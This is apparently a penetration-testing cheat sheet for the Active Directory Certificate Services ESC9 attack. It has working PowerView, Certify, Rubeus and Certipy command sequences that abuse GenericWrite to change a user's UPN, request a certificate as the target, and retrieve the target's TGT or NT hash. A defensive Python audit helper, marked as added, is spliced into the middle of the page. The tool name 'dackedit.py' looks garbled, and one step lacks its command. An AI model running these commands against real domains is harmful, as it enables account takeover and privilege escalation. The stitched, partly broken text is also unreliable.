ESC9
ESC9 is exploitable when the StrongCertificateBindingEnforcement registry value is not set to 2 (or the certificate mapping configuration includes the UPN flag), the template has CT_FLAG_NO_SECURITY_EXTENSION set and specifies client authentication, and the attacker holds GenericWrite over account A, which is then used to compromise account B.
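The preconditions above can be checked from the defender's side. The following is an added audit helper, not part of the original cheat sheet or of Certify/Certipy; it runs on constructed sample data and assumes the values would in practice be read from the DC registry (StrongCertificateBindingEnforcement under HKLM\SYSTEM\CurrentControlSet\Services\Kdc, CertificateMappingMethods under the Schannel key) and from the pKICertificateTemplate objects in the Configuration partition. It interprets "includes the UPN flag" as the Schannel CertificateMappingMethods bit 0x4; the template and registry names in SAMPLE_TEMPLATES are placeholders.

```python
"""Audit helper for the ESC9 preconditions (added example, not from the page)."""

# Bit in msPKI-Enrollment-Flag that suppresses the SID security extension
# (szOID_NTDS_CA_SECURITY_EXT) on certificates issued from the template.
CT_FLAG_NO_SECURITY_EXTENSION = 0x80000

# Schannel CertificateMappingMethods bit that allows UPN-based mapping.
CERT_MAP_UPN = 0x4

# EKUs that make a certificate usable for client/domain authentication.
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}


def strong_binding_bypassable(strong_binding, mapping_methods):
    """True when the KDC does not fully enforce strong binding (value != 2;
    an absent value is treated conservatively as not enforced) or when
    Schannel still accepts UPN-based certificate mapping."""
    kdc_weak = strong_binding != 2
    schannel_weak = mapping_methods is not None and bool(mapping_methods & CERT_MAP_UPN)
    return kdc_weak or schannel_weak


def allows_client_auth(ekus):
    """An empty EKU list imposes no usage restriction, so it also allows client auth."""
    return not ekus or any(eku in CLIENT_AUTH_EKUS for eku in ekus)


def template_is_esc9(enrollment_flag, ekus):
    """Template-level ESC9 condition: no security extension plus client authentication."""
    return bool(enrollment_flag & CT_FLAG_NO_SECURITY_EXTENSION) and allows_client_auth(ekus)


def audit_esc9(strong_binding, mapping_methods, templates):
    """Return names of templates that meet the ESC9 template conditions, but only
    when the domain-level binding settings make the missing SID extension matter.
    The GenericWrite condition is an ACL question and is not evaluated here."""
    if not strong_binding_bypassable(strong_binding, mapping_methods):
        return []
    return [t["name"] for t in templates
            if template_is_esc9(t["enrollment_flag"], t["ekus"])]


# Constructed sample data: placeholder template objects, not from a real forest.
# 0x20 is CT_FLAG_AUTO_ENROLLMENT, included only to show that other bits are ignored.
SAMPLE_TEMPLATES = [
    {"name": "ESC9-User", "enrollment_flag": 0x80000 | 0x20, "ekus": ["1.3.6.1.5.5.7.3.2"]},
    {"name": "WebServer", "enrollment_flag": 0x80000, "ekus": ["1.3.6.1.5.5.7.3.1"]},
    {"name": "User", "enrollment_flag": 0x20, "ekus": ["1.3.6.1.5.5.7.3.2"]},
    {"name": "NoEKU", "enrollment_flag": 0x80000, "ekus": []},
]

if __name__ == "__main__":
    # Compatibility mode (1) on the KDC, no Schannel override: two templates flagged.
    print("compat mode:", audit_esc9(1, None, SAMPLE_TEMPLATES))
    # Full enforcement (2) closes the issue regardless of template flags.
    print("full enforcement:", audit_esc9(2, None, SAMPLE_TEMPLATES))
    # Full enforcement on the KDC but UPN mapping still enabled in Schannel.
    print("schannel UPN mapping:", audit_esc9(2, CERT_MAP_UPN, SAMPLE_TEMPLATES))
```

The WebServer template is excluded even though it lacks the security extension, because its only EKU is Server Authentication; the NoEKU template is included because an empty EKU list does not restrict usage. Setting StrongCertificateBindingEnforcement to 2 and removing the UPN bit from CertificateMappingMethods empties the result for every template, which is the mitigation the preconditions imply.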
Windows
User's Password Reset
PS /home/bobbuilder> Set-DomainUserPassword -Identity <account_name> -AccountPassword $((ConvertTo-SecureString <new_password> -AsPlainText -Force))
Change the user UPN to the target's UPN
PS /home/bobbuilder> Set-DomainObject <account_name> -Set @{'userPrincipalName'='<target_name>@minions.com'} -Verbose
Request as the user
PS /home/bobbuilder> .\Certify.exe request /ca:<ca> /template:<template_name> /altname:<target_name>
Convert certificate to PFX
Retrieve the TGT of the victim
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:<target_name> /certificate:<target_name>.pfx /getcredentials /nowrap
Linux (Using Impacket's dackedit.py)
Get the NT hash of a user
bob$ certipy shadow auto -u user1@minions.com -p 'password1' -account <account_name>
Change the user UPN to the target's UPN
bob$ certipy account update -u user1@minions.com -p 'password1' -user <account_name> -upn <target_name>
Request as the user
bob$ certipy req <account_name> -hashes <account_hash> -ca <ca_name> -template <template_name>
Revert changes of the user
bob$ certipy account update -u user1@minions.com -p 'password1' -user <account_name> -upn <account_name>@minions.com
Authenticate as the target
bob$ certipy auth -pfx <target_name>.pfx -domain minions.com